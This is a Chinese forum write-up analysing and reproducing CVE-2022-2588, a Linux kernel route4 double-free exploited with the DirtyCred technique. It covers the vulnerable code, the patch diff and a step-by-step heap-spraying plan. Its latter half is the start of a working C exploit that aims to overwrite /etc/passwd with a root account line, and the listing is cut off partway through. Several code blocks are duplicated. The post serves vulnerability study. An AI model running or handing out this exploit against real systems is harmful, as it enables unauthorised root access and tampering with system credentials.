首页
社区
课程
招聘
[原创]CVE-2022-2588 Dirty Cred漏洞分析与复现
发表于: 2024-3-1 19:12 12454

[原创]CVE-2022-2588 Dirty Cred漏洞分析与复现

2024-3-1 19:12
12454

漏洞函数是 route4_change(),用于初始化和替换 route4_filter 对象。使用 handle 作为id来区分不同的 route4_filter,如果存在某个 handle 之前已被初始化过(fold 变量非空),就会移除旧的 filter,添加新的 filter;否则直接添加新的 filter

由于将 route4_filter 对象从链表中删除和释放时的检查条件不一致,导致该对象被释放后仍存于链表中,后面可以触发 Double Free,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题。

影响Linux Kernel版本:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9ad36309e2719a884f946678e0296be10f

安装 Kernel:

编译选项:

Kernel 凭证是 kernel 文档中定义的 kernel 中携带特权信息的特征,表示权限和对应的能力,主要分为:

众所周知,Linux 内核主要使用 slab 分配器来进行内存分配,slab 分配器中主要维护了两种内存缓存(即可以理解成两套作用不同的内存分配方式):

像 cred、file 结构体这类 credential 对象都是在 dedicated cache 中分配,而大多数内存漏洞发生的地方都是在 generic cache 中

使用 sudo cat /proc/slabinfo 可以查看 slab 分配器的具体信息

漏洞点

大致步骤:

具体步骤:(本例是采用 file 对象完成利用,也可以采用 cred 对象)

一般就是如下三种方式:

由于 credential 的替换需要一些时间,因此如果能延长这个竞争窗口,就能大幅提高漏洞利用的成功率。Userfaultfd 和 FUSE 这两种机制都允许用户无限延长竞争窗口

由于 Dirty Cred 十分需要控制 privilege credential 对象的分配时机,控制该对象的分配成为了一个关键点

用户层中:

内核层中,当内核创建新的 kernel thread 时,当前 kernel thread 将会被复制,这时其 privileged cred 结构体也会被拷贝一份

有两种方法可以做到这点:

这里可以发现,将 route4_filter 对象从链表中删除和释放时的检查条件不一致:

如果 old handle == 0,则不会在链表中删除但是会被释放,这就导致了一个 UAF

cross-cache:我们将释放某个 kmalloc-256 cache page,将该页归还给页管理器,然后分配 file 结构来复用该页(filp cache)

借用其他师傅的表

对应 exp 如下:

结果如下:

参考文章:

CVE-2022-2588 Double-free 漏洞 DirtyCred 利用

浅析 Linux Dirty Cred 新型漏洞利用方式

# Fetch and unpack the 5.19.1 kernel sources.
wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz
tar -xvf linux-5.19.1.tar.xz
cd linux-5.19.1
# Start from the default x86_64 config, then adjust options interactively;
# running defconfig after menuconfig would overwrite the edited .config.
make x86_64_defconfig
make menuconfig
make bzImage -j32
# Fetch and unpack the 5.19.1 kernel sources.
wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz
tar -xvf linux-5.19.1.tar.xz
cd linux-5.19.1
# Start from the default x86_64 config, then adjust options interactively;
# running defconfig after menuconfig would overwrite the edited .config.
make x86_64_defconfig
make menuconfig
make bzImage -j32
/*
 * Credential record, quoted from the kernel for reference.  It carries a
 * reference count, the task's real/saved/effective/filesystem UIDs and GIDs,
 * the capability sets, optional keyrings and LSM data, and pointers to the
 * owning user, user namespace and supplementary groups.
 */
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key  *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    /* RCU deletion */
    union {
        int non_rcu;            /* Can we skip RCU deletion? */
        struct rcu_head rcu;        /* RCU deletion hook */
    };
} __randomize_layout;
/*
 * Credential record, quoted from the kernel for reference.  It carries a
 * reference count, the task's real/saved/effective/filesystem UIDs and GIDs,
 * the capability sets, optional keyrings and LSM data, and pointers to the
 * owning user, user namespace and supplementary groups.
 */
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key  *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    /* RCU deletion */
    union {
        int non_rcu;            /* Can we skip RCU deletion? */
        struct rcu_head rcu;        /* RCU deletion hook */
    };
} __randomize_layout;
/*
 * Kernel open-file object, quoted for reference.  Besides list/RCU linkage it
 * holds the path and cached inode, the operations table, a lock, the
 * reference count (f_count), flags and mode (f_flags, f_mode), the position
 * and its mutex, owner and credential pointers (f_owner, f_cred), read-ahead
 * state and the address-space mapping.
 */
struct file {
    union {
        struct llist_node   fu_llist;
        struct rcu_head     fu_rcuhead;
    } f_u;
    struct path     f_path;
    struct inode        *f_inode;   /* cached value */
    const struct file_operations    *f_op;

    /*
     * Protects f_ep_links, f_flags.
     * Must not be taken from IRQ context.
     */
    spinlock_t      f_lock;
    enum rw_hint        f_write_hint;
    atomic_long_t       f_count;
    unsigned int        f_flags;
    fmode_t         f_mode;
    struct mutex        f_pos_lock;
    loff_t          f_pos;
    struct fown_struct  f_owner;
    const struct cred   *f_cred;
    struct file_ra_state    f_ra;

    u64         f_version;
#ifdef CONFIG_SECURITY
    void            *f_security;
#endif
    /* needed for tty driver, and maybe others */
    void            *private_data;

#ifdef CONFIG_EPOLL
    /* Used by fs/eventpoll.c to link all the hooks to this file */
    struct list_head    f_ep_links;
    struct list_head    f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
    struct address_space    *f_mapping;
    errseq_t        f_wb_err;
    errseq_t        f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));  /* lest something weird decides that 2 is OK */
 
/*
 * Variable-length file handle: a byte count and a type tag followed by the
 * identifier bytes stored in the trailing flexible array.
 */
struct file_handle {
    __u32 handle_bytes;
    int handle_type;
    /* file identifier */
    unsigned char f_handle[];
};
/*
 * Kernel open-file object, quoted for reference.  Besides list/RCU linkage it
 * holds the path and cached inode, the operations table, a lock, the
 * reference count (f_count), flags and mode (f_flags, f_mode), the position
 * and its mutex, owner and credential pointers (f_owner, f_cred), read-ahead
 * state and the address-space mapping.
 */
struct file {
    union {
        struct llist_node   fu_llist;
        struct rcu_head     fu_rcuhead;
    } f_u;
    struct path     f_path;
    struct inode        *f_inode;   /* cached value */
    const struct file_operations    *f_op;

    /*
     * Protects f_ep_links, f_flags.
     * Must not be taken from IRQ context.
     */
    spinlock_t      f_lock;
    enum rw_hint        f_write_hint;
    atomic_long_t       f_count;
    unsigned int        f_flags;
    fmode_t         f_mode;
    struct mutex        f_pos_lock;
    loff_t          f_pos;
    struct fown_struct  f_owner;
    const struct cred   *f_cred;
    struct file_ra_state    f_ra;

    u64         f_version;
#ifdef CONFIG_SECURITY
    void            *f_security;
#endif
    /* needed for tty driver, and maybe others */
    void            *private_data;

#ifdef CONFIG_EPOLL
    /* Used by fs/eventpoll.c to link all the hooks to this file */
    struct list_head    f_ep_links;
    struct list_head    f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
    struct address_space    *f_mapping;
    errseq_t        f_wb_err;
    errseq_t        f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));  /* lest something weird decides that 2 is OK */
 
/*
 * Variable-length file handle: a byte count and a type tag followed by the
 * identifier bytes stored in the trailing flexible array.
 */
struct file_handle {
    __u32 handle_bytes;
    int handle_type;
    /* file identifier */
    unsigned char f_handle[];
};
/*
 * One route4 classifier entry.  Entries are chained through `next` inside a
 * bucket (`bkt`); `handle` identifies the entry, `exts` holds its extensions
 * and `rwork` is the work item used when the entry is released.
 */
struct route4_filter {
    struct route4_filter __rcu  *next;
    u32         id;
    int         iif;

    struct tcf_result   res;
    struct tcf_exts     exts;
    u32         handle;
    struct route4_bucket    *bkt;
    struct tcf_proto    *tp;
    struct rcu_work     rwork;
};
/*
 * One route4 classifier entry.  Entries are chained through `next` inside a
 * bucket (`bkt`); `handle` identifies the entry, `exts` holds its extensions
 * and `rwork` is the work item used when the entry is released.
 */
struct route4_filter {
    struct route4_filter __rcu  *next;
    u32         id;
    int         iif;

    struct tcf_result   res;
    struct tcf_exts     exts;
    u32         handle;
    struct route4_bucket    *bkt;
    struct tcf_proto    *tp;
    struct rcu_work     rwork;
};
/*
 * Classifier extensions.  With CONFIG_NET_CLS_ACT it also carries the action
 * count and the `actions` pointer array; `action` and `police` are the
 * classifier-specific TLV type numbers described below.
 */
struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
    __u32   type; /* for backward compat(TCA_OLD_COMPAT) */
    int nr_actions;
    struct tc_action **actions;
    struct net *net;
#endif
    /* Map to export classifier specific extension TLV types to the
     * generic extensions API. Unsupported extensions must be set to 0.
     */
    int action;
    int police;
};
/*
 * Classifier extensions.  With CONFIG_NET_CLS_ACT it also carries the action
 * count and the `actions` pointer array; `action` and `police` are the
 * classifier-specific TLV type numbers described below.
 */
struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
    __u32   type; /* for backward compat(TCA_OLD_COMPAT) */
    int nr_actions;
    struct tc_action **actions;
    struct net *net;
#endif
    /* Map to export classifier specific extension TLV types to the
     * generic extensions API. Unsupported extensions must be set to 0.
     */
    int action;
    int police;
};
/*
 * Create a route4 filter, or replace the existing one passed in through *arg.
 *
 * This is the pre-fix (vulnerable) version quoted for analysis.  The old
 * filter is unlinked from its bucket list only when
 * `fold && fold->handle && f->handle != fold->handle`, but it is queued for
 * release whenever `fold` is non-NULL.  An old filter whose handle is 0 is
 * therefore released while still linked in the list.
 *
 * Returns 0 on success or a negative errno; on failure the newly allocated
 * filter is destroyed and freed.
 */
static int route4_change(struct net *net, struct sk_buff *in_skb,
             struct tcf_proto *tp, unsigned long base, u32 handle,
             struct nlattr **tca, void **arg, bool ovr,
             bool rtnl_held, struct netlink_ext_ack *extack)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_filter __rcu **fp;
    struct route4_filter *fold, *f1, *pfp, *f = NULL;
    struct route4_bucket *b;
    struct nlattr *opt = tca[TCA_OPTIONS];
    struct nlattr *tb[TCA_ROUTE4_MAX + 1];
    unsigned int h, th;
    int err;
    bool new = true;

    if (opt == NULL)
        return handle ? -EINVAL : 0;

    err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
                      route4_policy, NULL);
    if (err < 0)
        return err;

    fold = *arg; /* existing route4_filter, if any */
    if (fold && handle && fold->handle != handle)
            return -EINVAL;

    err = -ENOBUFS;
    f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* allocate the new route4_filter */
    if (!f)
        goto errout;

    err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* initialise exts; per the write-up this allocates a 256-byte exts.actions array (allocation not visible here) */
    if (err < 0)
        goto errout;

    if (fold) { /* copy the old filter's fields into the new filter */
        f->id = fold->id;
        f->iif = fold->iif;
        f->res = fold->res;
        f->handle = fold->handle;

        f->tp = fold->tp;
        f->bkt = fold->bkt;
        new = false;
    }

    err = route4_set_parms(net, tp, base, f, handle, head, tb,
                   tca[TCA_RATE], new, ovr, extack); /* fill in the new filter's parameters */
    if (err < 0)
        goto errout;

    /* insert the new filter into its bucket list, before the first entry with a larger handle */
    h = from_hash(f->handle >> 16);
    fp = &f->bkt->ht[h];
    for (pfp = rtnl_dereference(*fp);
         (f1 = rtnl_dereference(*fp)) != NULL;
         fp = &f1->next)
        if (f->handle < f1->handle)
            break;

    tcf_block_netif_keep_dst(tp->chain->block);
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);

    /* unlink the old filter only if it exists, its handle is non-zero, and the new handle differs from it */
    if (fold && fold->handle && f->handle != fold->handle) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
        if (b) {
            fp = &b->ht[h]; /* ht[] holds the route4_filter list heads */
            for (pfp = rtnl_dereference(*fp); pfp;
                 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
                if (pfp == fold) {
                    rcu_assign_pointer(*fp, fold->next); /* unlink from the list */
                    break;
                }
            }
        }
    }

    route4_reset_fastmap(head);
    *arg = f;
    if (fold) { /* any old filter is released, whether or not it was unlinked above */
        tcf_unbind_filter(tp, &fold->res);
        tcf_exts_get_net(&fold->exts);
        tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* queue work that runs route4_delete_filter_work to release the old filter */
    }
    return 0;

errout:
    if (f)
        tcf_exts_destroy(&f->exts);
    kfree(f);
    return err;
}
/*
 * Create a route4 filter, or replace the existing one passed in through *arg.
 *
 * This is the pre-fix (vulnerable) version quoted for analysis.  The old
 * filter is unlinked from its bucket list only when
 * `fold && fold->handle && f->handle != fold->handle`, but it is queued for
 * release whenever `fold` is non-NULL.  An old filter whose handle is 0 is
 * therefore released while still linked in the list.
 *
 * Returns 0 on success or a negative errno; on failure the newly allocated
 * filter is destroyed and freed.
 */
static int route4_change(struct net *net, struct sk_buff *in_skb,
             struct tcf_proto *tp, unsigned long base, u32 handle,
             struct nlattr **tca, void **arg, bool ovr,
             bool rtnl_held, struct netlink_ext_ack *extack)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_filter __rcu **fp;
    struct route4_filter *fold, *f1, *pfp, *f = NULL;
    struct route4_bucket *b;
    struct nlattr *opt = tca[TCA_OPTIONS];
    struct nlattr *tb[TCA_ROUTE4_MAX + 1];
    unsigned int h, th;
    int err;
    bool new = true;

    if (opt == NULL)
        return handle ? -EINVAL : 0;

    err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
                      route4_policy, NULL);
    if (err < 0)
        return err;

    fold = *arg; /* existing route4_filter, if any */
    if (fold && handle && fold->handle != handle)
            return -EINVAL;

    err = -ENOBUFS;
    f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* allocate the new route4_filter */
    if (!f)
        goto errout;

    err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* initialise exts; per the write-up this allocates a 256-byte exts.actions array (allocation not visible here) */
    if (err < 0)
        goto errout;

    if (fold) { /* copy the old filter's fields into the new filter */
        f->id = fold->id;
        f->iif = fold->iif;
        f->res = fold->res;
        f->handle = fold->handle;

        f->tp = fold->tp;
        f->bkt = fold->bkt;
        new = false;
    }

    err = route4_set_parms(net, tp, base, f, handle, head, tb,
                   tca[TCA_RATE], new, ovr, extack); /* fill in the new filter's parameters */
    if (err < 0)
        goto errout;

    /* insert the new filter into its bucket list, before the first entry with a larger handle */
    h = from_hash(f->handle >> 16);
    fp = &f->bkt->ht[h];
    for (pfp = rtnl_dereference(*fp);
         (f1 = rtnl_dereference(*fp)) != NULL;
         fp = &f1->next)
        if (f->handle < f1->handle)
            break;

    tcf_block_netif_keep_dst(tp->chain->block);
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);

    /* unlink the old filter only if it exists, its handle is non-zero, and the new handle differs from it */
    if (fold && fold->handle && f->handle != fold->handle) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
        if (b) {
            fp = &b->ht[h]; /* ht[] holds the route4_filter list heads */
            for (pfp = rtnl_dereference(*fp); pfp;
                 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
                if (pfp == fold) {
                    rcu_assign_pointer(*fp, fold->next); /* unlink from the list */
                    break;
                }
            }
        }
    }

    route4_reset_fastmap(head);
    *arg = f;
    if (fold) { /* any old filter is released, whether or not it was unlinked above */
        tcf_unbind_filter(tp, &fold->res);
        tcf_exts_get_net(&fold->exts);
        tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* queue work that runs route4_delete_filter_work to release the old filter */
    }
    return 0;

errout:
    if (f)
        tcf_exts_destroy(&f->exts);
    kfree(f);
    return err;
}
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);
 
-   if (fold && fold->handle && f->handle != fold->handle) {
+   if (fold) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
    rcu_assign_pointer(f->next, f1);
    rcu_assign_pointer(*fp, f);
 
-   if (fold && fold->handle && f->handle != fold->handle) {
+   if (fold) {
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
进程1 进程2
0. 绑定到 CPU 0 上运行,设置子进程内存、工作目录、Namespace,启动进程2
1. 去碎片化,打开10000个文件,消耗 filp cache,为 cross-cache 作准备
2. 喷射 (middle+3)*32 kmalloc-192 & kmalloc-256(和漏洞对象位于同一cache,便于进行 cross-cache 被 file 对象复用)
3. 分配1个 route4_filter 漏洞对象,还有1个kmalloc-256 的漏洞对象
4. 再喷射 (end-middle-2)*32 kmalloc-192 & kmalloc-256
5. 释放 (end-24)*32 kmalloc-192 & kmalloc-256
6. 第1次释放漏洞对象 kmalloc-192 & kmalloc-256
7. 释放 (end-middle+1) kmalloc-192 & kmalloc-256(避免连续释放同一对象,触发内核 double-free 的检测)
8. 喷射 4000 个低权限 file 对象(通过打开 exp_dir/data 文件)
9. 第2次释放漏洞对象 kmalloc-192 & kmalloc-256
10. 喷射 5000 个低权限 file 对象,采用 kcmp 调用检查是否和前 4000 个 file 重合,重合的两个 file 记为 overlap_a / overlap_b
11. 发起3个利用线程,线程1写入大量数据来占用文件锁,线程2往 overlap_a 写入恶意数据
12. 线程3关闭 overlap_a / overlap_b,喷射 4096*2 个高权限 file 对象(通过打开 /etc/passwd 文件),未区分CPU
13. 最后检查 /etc/passwd 文件是否被写入恶意数据
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
 
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>
 
#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>
 
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>
 
#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>
 
/* File-scope state shared by the helper functions and worker threads. */
char* target = "/etc/passwd";                   // overwrite the target file
char* overwrite = "hi:x:0:0:root:/:/bin/sh\n";  // alternative: "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\n"
char* global;
char* self_path;
char* content;                                  // evil data + existing data in the target file

#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000

int fds[MAX_FILE_NUM] = {0};
int fd_2[MAX_FILE_NUM] = {0};
int overlap_a = -1;     // unprivileged `file`
int overlap_b = -1;     // privileged `file`

int cpu_cores = 0;      // num of cpu cores
int sockfd = -1;

int spray_num_1 = 2000; // 4000
int spray_num_2 = 4000; // 5000

int pipe_main[2];       // notify process to execute using pipe
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];

/* Plain ints polled across threads; this relies on the -O0 build noted at the top of the program. */
int run_write = 0;      // let thread 2 begin to write evil data
int run_spray = 0;      // let thread 3 begin to spray privileged `file`
bool overlapped = false;
 
/*
 * Dump `size` bytes of `buf` as 64-bit hex words, two words per output line,
 * each line prefixed with its row index.  Trailing bytes that do not fill a
 * whole 8-byte word are not printed.
 */
void print_hex(char* buf, int size) {
    puts("======================================");
    printf("data :\n");
    for (int i = 0; i < (size / 8); i++) {
        uint64_t word;

        /* memcpy: buf is a byte buffer and need not be 8-byte aligned */
        memcpy(&word, buf + i * 8, sizeof(word));
        if (i % 2 == 0) {
            printf("%d", i / 2);
        }
        printf(" %16llx", (unsigned long long)word);
        if (i % 2 == 1) {
            printf("\n");
        }
    }
    puts("======================================");
}
/*
 * Restrict the calling thread to the single CPU `cpu`.
 * Prints the error and terminates the process if the affinity cannot be set.
 */
void pin_on_cpu(int cpu) {
    cpu_set_t only_this_cpu;

    CPU_ZERO(&only_this_cpu);
    CPU_SET(cpu, &only_this_cpu);

    /* pid 0 means "the caller" */
    if (sched_setaffinity(0, sizeof(only_this_cpu), &only_this_cpu) == 0)
        return;

    perror("sched_setaffinity()");
    exit(EXIT_FAILURE);
}
 
/*
 * Format `what` (printf-style, at most 1023 bytes) and write it to the
 * existing file `file` in a single write().
 *
 * Returns true only if the whole text was written.  Returns false if the file
 * cannot be opened or the write is short or fails; in the latter case errno is
 * the value left by write(), not by the subsequent close().
 */
static bool write_file(const char* file, const char* what, ...) {
    char text[1024];
    va_list ap;

    va_start(ap, what);
    vsnprintf(text, sizeof(text), what, ap);
    va_end(ap);
    text[sizeof(text) - 1] = 0;

    int out = open(file, O_WRONLY | O_CLOEXEC);
    if (out == -1)
        return false;

    int want = strlen(text);
    bool complete = (write(out, text, want) == want);
    int write_errno = errno;

    close(out);
    if (!complete)
        errno = write_errno;
    return complete;
}
/*
 * Recreate the working directory "exp_dir" (with empty files data and data2),
 * make it world-accessible, chdir into it and create the symlink
 * ./uaf -> ./data.  Exits with status 1 if chmod or chdir fails; the results
 * of the shell commands and of symlink() are not checked.
 */
static void use_temporary_dir(void) {
    static const char workdir[] = "exp_dir";

    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");

    if (chmod(workdir, 0777) != 0)
        exit(1);
    if (chdir(workdir) != 0)
        exit(1);

    symlink("./data", "./uaf");
}
// setup process memory
static void adjust_rlimit() {
    struct rlimit rlim;
    rlim.rlim_cur = rlim.rlim_max = (200 << 20);
    setrlimit(RLIMIT_AS, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 32 << 20;
    setrlimit(RLIMIT_MEMLOCK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 136 << 20;
    // setrlimit(RLIMIT_FSIZE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 1 << 20;
    setrlimit(RLIMIT_STACK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &rlim);
    // RLIMIT_FILE
    rlim.rlim_cur = rlim.rlim_max = 14096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {  // RLIMIT_NOFILE 最大打开文件描述符限制,默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
        rlim.rlim_cur = rlim.rlim_max = 4096;
        spray_num_1 = 1200;
        spray_num_2 = 2800;
        if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
            perror("[-] setrlimit");
            err(1, "[-] setrlimit");
        }
    }
}
 
/*
 * Move the process into a new user namespace and a new network namespace,
 * then map uid/gid 0 inside the namespace to the caller's original uid/gid.
 * Any failure is reported with perror() and terminates the process.
 */
void setup_namespace() {
    /* Read before unshare(): these are the outside IDs written into the maps below. */
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    /* setgroups is written before gid_map; see user_namespaces(7) for the ordering rule. */
    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}
 
/*
 * One-time process setup, in this order: resource limits, then the working
 * directory, then the user/network namespaces.
 */
void pre_exploit() {
    adjust_rlimit();
    use_temporary_dir();
    setup_namespace();
}
 
/*
 * Pointer to the first byte after netlink message `nmsg` (its nlmsg_len
 * rounded up with NLMSG_ALIGN), typed as the next attribute to be appended.
 */
#define NLMSG_TAIL(nmsg)                                                       \
  ((struct rtattr *)(((char *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
/*
 * Write one rtattr (header plus `len` payload bytes copied from `data`) at
 * `attr`.  No bounds are checked; the caller must provide enough room.
 *
 * Returns RTA_LENGTH(len), i.e. header size plus payload length WITHOUT
 * trailing alignment padding.
 */
int addattr(char* attr, int type, void* data, int len) {
    struct rtattr* hdr = (struct rtattr*)attr;
    const int total = RTA_LENGTH(len);

    hdr->rta_len = total;
    hdr->rta_type = type;
    if (len != 0)
        memcpy(RTA_DATA(hdr), data, len);

    return total;
}
/*
 * Append one attribute to the end of netlink message `n`, refusing to grow
 * the message beyond `maxlen` bytes.
 *
 * `data` may be NULL when `alen` is 0 (header-only attribute, as used to open
 * a nest).  On success nlmsg_len is advanced by the aligned attribute size
 * and 0 is returned; if the attribute would not fit, an error is printed to
 * stderr, the message is left untouched and -1 is returned.
 */
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
    int len = RTA_LENGTH(alen);
    struct rtattr* rta;

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen)
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}
 
/*
 * Open a nested attribute of `type` at the end of message `n`.
 * Returns the position of the nest header, to be passed to
 * addattr_nest_end() once the children have been appended.  The result of
 * the underlying addattr_l() call is not checked.
 */
struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
    /* remember where the header will land before the message grows */
    struct rtattr* nest_start = NLMSG_TAIL(n);

    (void)addattr_l(n, maxlen, type, NULL, 0);
    return nest_start;
}
 
/*
